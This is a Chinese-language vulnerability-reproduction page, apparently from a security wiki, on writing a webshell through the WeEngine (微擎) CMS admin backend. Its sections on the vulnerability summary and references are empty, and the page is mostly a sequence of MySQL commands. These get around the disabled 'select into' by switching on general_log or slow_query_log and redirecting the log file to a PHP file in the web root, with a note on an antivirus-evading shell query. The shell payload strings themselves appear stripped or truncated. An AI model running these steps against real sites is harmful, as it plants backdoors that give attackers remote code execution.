微擎_后台绕过禁用函数写shell

# 微擎 后台绕过禁用函数写shell

========================

一、漏洞简介
————

二、漏洞影响
————

三、复现过程
————

### 1.站点设置里面打开调试

![](/static/qingy/微擎_后台绕过禁用函数写shell/img/rId25.png)

### 2.执行语句

select into被禁止

![](/static/qingy/微擎_后台绕过禁用函数写shell/img/rId27.png)

### 3.利用日志文件写shell

show variables like ‘%general%’; #查看配置

set global general_log = on; #开启general log模式

set global general_log_file = ‘/var/www/html/1.php’; #设置日志目录为shell地址

select ‘‘ #写入shell

![](/static/qingy/微擎_后台绕过禁用函数写shell/img/rId29.png)

### 4.SQL查询免杀shell的语句

SELECT “‘a’,’pffff’=>’s’,’e’=>’fffff’,’lfaaaa’=>’r’,’nnnnn’=>’t’);$

### 补充:来自土司\@GuoKerSb的分享

在无法修改general\_log\_file指向的地址且网站用户量多时刻处于查询的状态,我们还可以通过启动slow\_query\_log(慢查询日志,默认关闭)来写shell

set global slow_query_log=1;
set global slow_query_log_file=’/var/www/html/1.php’;
select ‘‘ or sleep(11);

四、参考链接
————

>

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容